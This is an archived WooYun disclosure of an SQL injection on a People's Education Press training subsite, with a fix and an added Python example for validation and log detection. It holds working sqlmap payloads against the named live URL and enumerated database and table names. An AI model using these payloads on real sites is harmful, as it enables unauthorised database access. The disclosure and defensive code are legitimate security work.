WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2014-05-07: Details reported to the vendor; awaiting vendor response
2014-05-10: Vendor confirmed; details disclosed to the vendor only
2014-05-20: Details disclosed to core white hats and domain experts
2014-05-30: Details disclosed to regular white hats
2014-06-09: Details disclosed to intern white hats
2014-06-21: Details disclosed to the public
SQL injection on a subsite of People's Education Press (人民教育出版社)
Target:
http://gp.pep.com.cn/
Injection point: http://gp.pep.com.cn/guopei/website/news/info.aspx?content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793
Place: GET
Parameter: content_uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793' AND 7426=7426 AND 'xVTC'='xVTC

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793' AND 7370=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(113)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (7370=7370) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(99)+CHAR(116)+CHAR(58))) AND 'Vbxr'='Vbxr

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] Enterprise
[*] gp2013
[*] guopei
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: guopei
[992 tables]
A
Course
Node
Nv_Connection
TB_ReceiveSMS
bbs_forum
bbs_forum_admin
bbs_forum_relative
bbs_forum_type
bbs_replay
bbs_topic
bbs_visit_log
book_book
book_borrower
book_order_book
book_order_header
book_press
book_renew
book_shelve_record
book_shopcart
book_user_shopcart
bos_advt
bos_ec_balance_account_log
bos_ec_comment
bos_ec_deliver_type
bos_ec_favorite
bos_ec_generate_rule
bos_ec_payment_bank
bos_ec_payment_log
bos_ec_payment_platform
bos_ec_payment_type
... (table listing truncated in the report)
Vulnerability proof: as above (see the sqlmap output).
Fix recommendation: patch the injection. content_uid is a GUID, so validate it as one and pass it to SQL Server as a bind parameter instead of splicing it into the statement text.
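The following is an added example and is not code from the WooYun report or from the pep.com.cn application. The report shows that content_uid carries a GUID and that quote-breakout payloads reach the database, so the example assumes (the page does not show the server code) that the ASP.NET page concatenates the raw parameter into its SQL. It shows that concatenation pattern, the GUID validation plus parameterised query that closes it, and a classifier that spots the same four sqlmap payload shapes in IIS request logs. The GUID and the payloads are the report's; the table and column names, the function names, and the log lines are constructed for the example.

```python
"""Added example for the content_uid injection: assumed vulnerable query,
hardened query, and log-side detection of the sqlmap payload shapes."""
import re
import uuid
from urllib.parse import unquote_plus

# GUID from the report's injection URL.
ORIGINAL_UID = "d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793"

# The four sqlmap payloads from the report. The error-based one uses MSSQL
# '+' string concatenation; URL decoding turns a bare '+' into a space,
# which is why copies of the report show it with spaces.
PAYLOADS = {
    "boolean": ORIGINAL_UID + "' AND 7426=7426 AND 'xVTC'='xVTC",
    "error": ORIGINAL_UID + "' AND 7370=CONVERT(INT,(CHAR(58)+CHAR(116)"
             "+CHAR(113)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (7370=7370)"
             " THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(99)"
             "+CHAR(116)+CHAR(58))) AND 'Vbxr'='Vbxr",
    "stacked": ORIGINAL_UID + "'; WAITFOR DELAY '0:0:5'--",
    "time": ORIGINAL_UID + "' WAITFOR DELAY '0:0:5'--",
}

# Exactly one dashed GUID, nothing before or after it.
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")


def build_query_unsafe(content_uid: str) -> str:
    """Assumed vulnerable pattern (hypothetical table/columns): the raw
    parameter is pasted into the SQL text, so a single quote ends the
    literal and everything after it is executed as SQL."""
    return ("SELECT title, body FROM news WHERE content_uid = '"
            + content_uid + "'")


def parse_content_uid(raw: str) -> str:
    """Accept only a dashed GUID and return its canonical form.
    uuid.UUID alone is too lenient (braces, urn:uuid: prefix, missing
    dashes), so the exact format is checked first."""
    if not GUID_RE.fullmatch(raw):
        raise ValueError("content_uid is not a GUID")
    return str(uuid.UUID(raw))


def build_query_safe(raw: str):
    """Hardened form: validated value handed over as a bind parameter
    (SqlParameter in ADO.NET, '?' placeholder in pyodbc), never spliced
    into the statement. Returns (sql, params)."""
    uid = parse_content_uid(raw)
    return "SELECT title, body FROM news WHERE content_uid = ?", (uid,)


def is_rejected(raw: str) -> bool:
    """True when the validator refuses the value."""
    try:
        parse_content_uid(raw)
    except ValueError:
        return True
    return False


# Signatures for the payload shapes sqlmap used against this endpoint.
SIGNATURES = {
    "time-based": re.compile(r"waitfor\s+delay", re.I),
    "error-based": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "stacked": re.compile(r";\s*(waitfor|exec|select|insert|update|delete|drop)\b", re.I),
    "boolean": re.compile(r"'\s*(and|or)\s+\S+\s*=\s*\S+", re.I),
}


def classify_payload(decoded: str) -> set:
    """Return the set of technique names whose signature appears in an
    already URL-decoded query string (empty set for a clean request)."""
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


# Constructed W3C-style IIS log lines (fields: date time s-ip cs-method
# cs-uri-stem cs-uri-query s-port cs-username c-ip). The queries carry the
# report's payloads percent-encoded as sqlmap would send them; IPs are
# documentation ranges.
SAMPLE_LOG = [
    "2014-05-07 10:00:01 10.0.0.5 GET /guopei/website/news/info.aspx "
    "content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793 80 - 203.0.113.5",
    "2014-05-07 10:00:02 10.0.0.5 GET /guopei/website/news/info.aspx "
    "content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793%27+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.5",
    "2014-05-07 10:00:03 10.0.0.5 GET /guopei/website/news/info.aspx "
    "content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.5",
    "2014-05-07 10:00:04 10.0.0.5 GET /guopei/website/news/info.aspx "
    "content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793%27+AND+7426%3D7426+AND+%27xVTC%27%3D%27xVTC 80 - 198.51.100.7",
]


def scan_log(lines):
    """Return [(client_ip, sorted technique names)] for every request whose
    decoded query string matches at least one signature."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 9:
            continue
        query = unquote_plus(fields[5])
        tags = classify_payload(query)
        if tags:
            hits.append((fields[8], sorted(tags)))
    return hits


if __name__ == "__main__":
    print(build_query_unsafe(PAYLOADS["boolean"]))
    print(build_query_safe(ORIGINAL_UID))
    print(scan_log(SAMPLE_LOG))
```

The validator is the real fix for this endpoint: with a strict GUID check none of the four payloads ever reaches the query, and binding the value as a parameter protects the statement even if the check is later relaxed. The log classifier is coarse by design (a `'` followed by `AND x=y` is enough for the boolean signature), so treat its hits as triage candidates to confirm against the response sizes and timings, not as proof of exploitation.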
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-05-10 00:22
CNVD confirmed and reproduced the reported issue and has directly contacted the website's managing organization, the People's Education Press (国培计划, National Training Program) site administrators, to handle it.
None yet